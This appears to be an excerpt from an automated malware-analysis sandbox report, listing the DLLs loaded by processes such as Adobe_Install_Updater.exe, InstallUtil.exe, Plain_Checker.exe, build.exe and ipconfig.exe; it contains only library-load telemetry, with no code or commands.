Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dnsapi.dll
